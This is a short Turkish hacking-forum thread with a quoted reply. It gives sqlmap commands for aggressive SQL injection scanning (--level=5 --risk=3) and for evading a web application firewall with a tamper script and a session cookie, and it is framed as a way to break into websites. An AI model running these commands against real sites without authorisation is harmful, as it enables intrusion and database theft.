İleri Seviye Sqlmap

bywordlist

Üye
27 Ağu 2021
122
31
25
Level Riskleri:

Level riskleri ile bir sitede neredeyse bir açığı rahatça bulabilirsiniz çünkü acayip fazla payload deniyor ve buda işlemin geçikmesine sebep olur mesela sen bir sitede sql inject oldugunu kesin bir şekilde kanıtladın ama siteye sızamıyorsun nedeni payloadların o güvenlik duvarı üzerindeki etkisizlikleri

sqlmap -u "deneme.com" --dbs --level=5 --risk=3 burada leveli riskleri kendiniz değer verebilirsiniz

sqlmap -hh bu komut ile tüm parametreleri görüntüleyebilirsiniz


WAF:


waf nasıl atlatırız dersek onlarıda tamper scriptleri ile atlatabiliriz

Örnek: sqlmap -u "denemecom" -cookie --cookie "security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb" --tamper "randomcase" --dbs
 

DARACULA

Üye
9 Haz 2019
118
38
Dünya
Level Riskleri:

Level riskleri ile bir sitede neredeyse bir açığı rahatça bulabilirsiniz çünkü acayip fazla payload deniyor ve buda işlemin geçikmesine sebep olur mesela sen bir sitede sql inject oldugunu kesin bir şekilde kanıtladın ama siteye sızamıyorsun nedeni payloadların o güvenlik duvarı üzerindeki etkisizlikleri

sqlmap -u "deneme.com" --dbs --level=5 --risk=3 burada leveli riskleri kendiniz değer verebilirsiniz

sqlmap -hh bu komut ile tüm parametreleri görüntüleyebilirsiniz


WAF:


waf nasıl atlatırız dersek onlarıda tamper scriptleri ile atlatabiliriz

Örnek: sqlmap -u "denemecom" -cookie --cookie "security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb" --tamper "randomcase" --dbs
eline sağlık
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.